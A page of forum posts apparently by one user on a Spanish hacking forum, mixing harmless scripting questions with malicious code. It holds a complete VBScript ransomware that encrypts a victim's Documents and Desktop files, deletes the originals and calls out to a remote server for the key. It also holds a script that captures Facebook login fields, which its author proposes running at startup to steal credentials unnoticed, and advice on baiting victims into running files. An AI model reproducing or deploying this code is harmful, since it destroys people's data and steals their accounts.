elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 120
261  Programación / .NET (C#, VB.NET, ASP) / [Aporte] Ghost Killer Adf.ly by Flamer en: 27 Diciembre 2016, 17:44 pm




Proyecto:   Ghost Killer  Adf.ly

         Autor:   Flamer

Referencias: https://foro.elhacker.net/net/c_adfly_killer_05-t455465.0.html;msg2080233

             Por:  Doddy

    Lenguaje:  VB:Net 2010     

Descripción: Basado en el programa de Doddy, este también decodifica los enlaces adf.ly pero con la diferencia de que este tiene un modo de trabajo invisible sin la necesidad de estar llamando al programa cada rato este a párese cuando un enlace adf.ly asido copiado al porta papeles con la decodificación ya realizada.


Código
  1. Public Class Form1
  2.    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
  3.        Timer1.Interval = 3000
  4.        Timer2.Interval = 1
  5.        msg.Visible = False
  6.    End Sub
  7.  
  8.  
  9.    Function decodifica(l)
  10.        On Error Resume Next
  11.        Dim web As New Object
  12.        Dim i, f, x As Integer
  13.        Dim a, b, t, code As String
  14.  
  15.        Err.Number = 0
  16.  
  17.        web = CreateObject("Microsoft.XmlHttp")
  18.        web.open("Get ", l, False)
  19.        web.send()
  20.        code = web.responseText
  21.  
  22.  
  23.  
  24.        i = InStr(code, "var ysmm")
  25.        f = InStr(code, "var easyUrl") - i
  26.        code = Mid(code, i, f)
  27.        code = Replace(code, "var ysmm = '", "")
  28.        code = Trim(Replace(code, "';", ""))
  29.        a = ""
  30.        b = ""
  31.        If Err.Number <> 0 Then
  32.            decodifica = "...:::Error En La Decodificacion:::..."
  33.        Else
  34.            For x = 1 To Len(code)
  35.                t = (x - 1) Mod 2
  36.                If t = 0 Then
  37.                    a = a & Mid(code, x, 1)
  38.                Else
  39.                    b = Mid(code, x, 1) & b
  40.                End If
  41.            Next
  42.  
  43.  
  44.            code = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(a & b))
  45.            decodifica = code.Substring(2)
  46.        End If
  47.  
  48.  
  49.    End Function
  50.  
  51.    Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
  52.        If url.Text <> "" Then
  53.            If InStr(url.Text, "adf.ly") Then
  54.                Resul.Text = decodifica(url.Text)
  55.            Else
  56.                MsgBox("No Es Una url De adf.ly", , "Aviso De Error")
  57.            End If
  58.        Else
  59.            MsgBox("El Campo Esta Vasio", , "Aviso De Error")
  60.        End If
  61.  
  62.    End Sub
  63.  
  64.    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
  65.        Clipboard.SetData("UnicodeText", Resul.Text)
  66.        msg.Visible = True
  67.        Timer1.Start()
  68.    End Sub
  69.  
  70.    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
  71.        msg.Visible = False
  72.        Timer1.Stop()
  73.    End Sub
  74.  
  75.    Private Sub Button3_Click(sender As System.Object, e As System.EventArgs) Handles Button3.Click
  76.        Me.Visible = False
  77.        Timer2.Start()
  78.  
  79.    End Sub
  80.  
  81.    Private Sub Timer2_Tick(sender As System.Object, e As System.EventArgs) Handles Timer2.Tick
  82.        Dim t As String
  83.  
  84.        t = CStr(Clipboard.GetData("UnicodeText"))
  85.  
  86.        If url.Text <> t Then
  87.            If InStr(t, "adf.ly") Then
  88.                url.Text = t
  89.                Resul.Text = decodifica(t)
  90.                If Resul.Text <> "...:::Error En La Decodificacion:::..." Then
  91.                    Timer2.Stop()
  92.                    Me.Visible = True
  93.                End If
  94.  
  95.            End If
  96.        End If
  97.    End Sub
  98.  
  99.    Private Sub Button4_Click(sender As System.Object, e As System.EventArgs) Handles Button4.Click
  100.        Resul.Text = ""
  101.        url.Text = ""
  102.    End Sub
  103. End Class
  104.  
  105.  




descarga codigo fuente mas Exe: http://www.mediafire.com/file/v02ew6doec1y2dj/Ghost_Killer_adf.ly.rar
262  Programación / Scripting / [Aporte] Obtener Nombre De Usuario y Contraseña De Facebook Con Un Simple script en: 25 Diciembre 2016, 04:15 am
Hola aquí unas de mis travesuras con vbscript que me encanta y es un código para obtener lo escrito en un campo de texto de x pagina como ejemplo puse la pagina de facebook aquí el código

Código
  1. set IE = CreateObject("InternetExplorer.Application")
  2.  
  3. IE.Navigate "https://www.facebook.com/"
  4. IE.visible = true
  5. Do While IE.ReadyState < 4
  6. Loop
  7. while IE.LocationURL = "https://www.facebook.com/"
  8.   u = IE.document.GetElementById("email").value
  9.   p = IE.document.GetElementById("pass").value
  10. wend
  11. msgbox u & "        " & p
  12.  
  13.  

pueden probarlo si gustan y seria mas divertido si ejecutamos el script al iniciar la pc y si el usuario ve la ejecución de Internet explorer normal y rellena los campos  jajajaja

saludos Flamer y lastima que no se puede usar chrome en vbscript
263  Seguridad Informática / Hacking / Re: ¿Como hago archivo autodescargable y ejecutable al entrar en una pagina web? en: 25 Diciembre 2016, 03:04 am
usa algo creativo para que muerda el anzuelo y el mismo lo ejecute

salu2
264  Seguridad Informática / Análisis y Diseño de Malware / Re: troyanos que funcionan como gusano? en: 21 Diciembre 2016, 03:51 am
Creo que eso era al principio se clasificaban los malwares como virus por que infectaban a los archivos para auto-ejecutarse y propagarse..

y los gusanos que no infectaban a los archivos sino que se multiplicaban por si solos y se valían del sistema para auto-ejecutarse...

pero como dije eso era al principio ahora en la actualidad es un revolvedero, se mezclaron los géneros, lo que si creo que se perdió son las bombas lógicas creo no se

saludos Flamer
265  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo De Ransomware en VBScript por Flamer en: 19 Diciembre 2016, 03:14 am
Actualizado el código ya no hace uso del winrar y la desventaja sigue siendo que ocupa internet en la pc victima.

esa desventaja se pude arreglar pero no quiero que al analizar el ransomware vean la generación de la clave

saludos Flamer y me falta una encriptacion asimetrica mientras sera via http
266  Programación / Scripting / Como manejar números mas grandes en Vbs en: 15 Diciembre 2016, 18:57 pm
hola amigos tengo este codigo en vbscript

Código
  1. x = (255^11)
  2. x = x - ((fix(x/5767))*5767)
  3. msgbox x
  4.  

el resultado deberia de ser 3960 pero en ves de eso me imprime 0 en el msgbox

anterior mente usaba el comando mod en la segunda linea pero me resultaba error así que use esa formula

y si en la primera linea remplazo el 11 por el 7 si me imprime el resultado correcto, pero yo quiero manejar números mas grandes que el 7 y el 11, y mi pregunta es si se puede en vbscript

saludos flamer
267  Foros Generales / Dudas Generales / Re: (Duda-Ayuda) Resolver 2 codigos en: 10 Diciembre 2016, 01:36 am
si les soy sincero no me creerían....el primero se me hizo el mas fácil jajajaja y al segundo no le encontraba ya que no me acordaba de la numeración octal casi nunca la e trabajado.

solo note los 30 y 31 que en hexadecimal son el 1 y el 0 con eso tuve para deducir que era binario

saludos

268  Foros Generales / Dudas Generales / Re: (Duda-Ayuda) Resolver 2 codigos en: 7 Diciembre 2016, 02:38 am
el primero decodificandolo esto me sale

Código:
x^2 - 8x + 16 = 0, Enter (x * 350)

voy por el segundo
269  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo De Ransomware en VBScript por Flamer en: 29 Noviembre 2016, 02:25 am
no se como se hace en vbs, pero en lugar de usas winrar, podrías abrir los archivos leerlos y reescribirlos cifrados (puede ser algo tan simple como un xor, no es nada de otro mundo y facil de conseguir la password si sabes algo de analisis criptografico y no corres el riesgo que el hdd está lleno y no se puedan crear los rar)

por otro lado la contraseña debe crearse en el server por practicidad

en vbs hasta donde yo se no se pueden leer archivos binarios

y lo de la password no se por que en el servidor, ya que la clave es aleatoria

y si te refieres a eso de analizar los paquetes, si verán cuando envía la clave al servidor, pero si la recibe de el creo que también la verán no crees

saludos flamer

------------------EDITO------------
ya se leer binario en vbs, encontré un código en google, creo que corregiré el codigo
270  Seguridad Informática / Análisis y Diseño de Malware / Codigo De Ransomware en VBScript por Flamer en: 28 Noviembre 2016, 20:18 pm
Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código
  1. option explicit
  2. dim shell,fso,document,f,password,desktop,id
  3.  
  4. set shell = createobject("wscript.shell")
  5. set fso = createobject("scripting.filesystemobject")
  6.  
  7. document = shell.SpecialFolders("MyDocuments")
  8. desktop = shell.SpecialFolders("Desktop")
  9.  
  10. set f = fso.getfolder(document)
  11. id = f.drive.serialnumber
  12.  
  13. password = Contrasena(id)
  14.  
  15. cifrar(document)
  16. cifrar(desktop)
  17.  
  18. msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"
  19.  
  20. function Contrasena(id)
  21.  dim objhttp
  22.  Set objhttp = createobject("Microsoft.XmlHttp")
  23.  
  24.  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  25.  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  26.  objhttp.send "id=" & id
  27.  
  28.  Contrasena = objhttp.responsetext
  29. end function
  30.  
  31. function cifrar(ruta)
  32.   dim carpeta,listfiles,listfolders,f
  33.  
  34.   set carpeta = fso.getfolder(ruta)
  35.   set listfolders = carpeta.subfolders
  36.   set listfiles = carpeta.files
  37.  
  38.   for each f in listfiles
  39.      archivo(f.path)
  40.   next
  41.  
  42.   for each f in listfolders
  43.      cifrar(f.path)
  44.   next  
  45. end function
  46.  
  47. function archivo(path)
  48.   dim file,largo,i,f,b,p,n
  49.  
  50.   set file = fso.getfile(path)
  51.  
  52.   largo=file.size
  53.  
  54.   set f = file.OpenAsTextStream()
  55.   redim bytes(largo)
  56.  
  57.   n = 1
  58.  
  59.   for i=0 to largo - 1
  60.      if n = len(password) then
  61.     n = 1
  62.  else
  63.         n = n + 1  
  64.      end if  
  65.  p = asc(mid(password,n,1))
  66.      b = asc(f.read(1)) xor p
  67.  bytes(i) = chr(b)
  68.   next
  69.  
  70.   f.close  
  71.  
  72.   set f = fso.createtextfile(file.path & ".crypt")
  73.  
  74.   for n = 0 to i - 1
  75.      f.write(bytes(n))
  76.   next
  77.  
  78.   f.close
  79.   file.delete
  80. end function
  81.  
  82.  


saludos Flamer
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 120
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines